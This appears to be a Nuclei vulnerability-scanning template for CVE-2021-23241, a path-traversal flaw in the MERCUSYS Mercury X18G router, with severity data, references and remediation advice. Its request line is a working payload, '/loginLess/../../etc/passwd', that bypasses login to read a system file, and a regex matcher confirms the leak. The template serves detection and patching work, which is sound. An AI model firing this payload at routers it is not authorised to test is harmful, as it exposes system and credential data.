47 lines
1.9 KiB
YAML
47 lines
1.9 KiB
YAML
id: CVE-2021-23241
|
|
|
|
info:
|
|
name: MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the router.
|
|
remediation: |
|
|
Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is implemented.
|
|
reference:
|
|
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
|
- https://www.mercusys.com/en/
|
|
- https://www.mercurycom.com.cn/product-521-1.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-23241
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00365
|
|
epss-percentile: 0.71874
|
|
cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: mercusys
|
|
product: mercury_x18g_firmware
|
|
tags: cve2021,cve,iot,lfi,router,mercusys
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/loginLess/../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e27843448fe355528b223c229c4990136292da3b9d228ec57fad2457da8a327502202f918b5d468c0ad30a3bd458ad9122f783b6c7b1268b4b2308bdf3b4d950ad2a:922c64590222798bb761d5b6d8e72950 |